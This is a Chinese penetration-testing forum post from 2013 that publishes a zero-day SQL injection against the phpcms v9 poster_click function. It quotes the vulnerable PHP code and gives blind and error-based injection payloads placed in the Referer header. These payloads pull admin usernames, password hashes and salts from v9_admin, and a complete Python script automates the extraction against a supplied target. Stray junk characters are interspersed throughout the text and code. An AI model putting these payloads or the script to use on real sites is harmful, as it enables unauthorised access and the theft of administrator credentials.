中国网络渗透测试联盟

标题: phpcms post_click注入0day利用代码 [打印本页]

---

作者: admin    时间: 2013-1-11 21:01
标题: phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
. z: y% i) Z, S4 M
7 p) W2 A2 n! R0 t: y1 I问题函数\phpcms\modules\poster\index.php

8 ]9 \. x: q) [/ Ipublic function poster_click() {
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$r = $this->db->get_one(array('id'=>$id));
! z% A( N( U+ ~; R3 bif (!is_array($r) && empty($r)) return false;
8 g4 S% @( X# H0 T$ip_area = pc_base::load_sys_class('ip_area');
' n, W. B$ j- ?& i8 m; C" @, I$ip = ip();
$area = $ip_area->get($ip);
1 s% S$ a& k: u& g$username = param::get_cookie('username') ? param::get_cookie('username') : '';
! z! K2 y4 b! X$ Q" [  wif($id) {
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
( D9 f" p6 v2 D$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
) g0 i% M' m) Y; Q# o! u3 o; c}
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
$ x; v( v: }7 L2 j$setting = string2array($r['setting']);
, I: _9 m. L" B8 i: Gif (count($setting)==1) {
  m) a! Z9 \1 d0 S$url = $setting['1']['linkurl'];
} else {
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
9 c  f( r: _* U" Y0 h$ m# H7 B}
header('Location: '.$url);
}
8 h% r3 J" B; U6 ?3 W) ^0 f


利用方式：
0 y' ^# a7 O7 S6 J6 G. \& m
2 E4 \7 t6 }1 i1 g3 ^4 \& M- g1、可以采用盲注入的手法：

referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
2 _& k, b' ?1 E; r- ]
通过返回页面，正常与否一个个猜解密码字段。
* ?( L/ x& V5 f$ h; p5 v
' c  [7 K* d2 w% y* q2、代码是花开写的，随手附上了：
1 A- [4 {1 `$ N
, B8 A0 g, W. p1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
3 E; d; P" d; s! I/ A
此方法是爆错注入手法，原理自查。

) ^% ?! j" N8 |1 \
" C+ A# T5 ^) {/ b' Y+ E
6 ^, o; d+ i' M利用程序:
. J6 L9 s/ ?- o& K4 M
) Y& O& r4 T2 `9 t4 ~#!/usr/bin/env python
( [6 V8 Y' `, ~import httplib,sys,re
8 }, I$ n+ k( @+ O2 r* \
& ~$ s' n2 m( L- c3 {8 j7 Rdef attack():
6 T0 H/ L/ x$ h$ q7 G8 ?print “Code by Pax.Mac Team conqu3r!”
- K' c' e, S5 t* e% S9 oprint “Welcome to our zone!!!”
+ |' X: Z' o% x( V; P# E& Surl=sys.argv[1]
1 h# Z" Y; p# N( N3 H" f) X8 ?paths=sys.argv[2]
8 I- u$ {$ D' ^8 [/ U4 P* Nconn = httplib.HTTPConnection(url)
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
6 M1 E7 [- H% c) z) S“Accept”: “text/plain”,
1 ]0 Y1 W3 P3 {4 ?. @“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
  c8 P7 t7 r" B( N5 Yconn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
6 f! \% p2 @* H! Wr1 = conn.getresponse()
datas=r1.read()
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
print datas[0]
conn.close()
if __name__==”__main__”:
8 e3 j( S% J1 ?  a' i- Yif len(sys.argv)<3:
7 C2 o" U$ n0 D# q+ _print “Code by Pax.Mac Team conqu3r”
2 P0 C& B$ |# H2 M( Xprint “Usgae:”
) U* {  t' z! k3 c# Eprint “    phpcmsattack.py   www.paxmac.org /”
print “    phpcmsataack.py   www.paxmac.org /phpcmsv9/”
sys.exit(1)
attack()

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2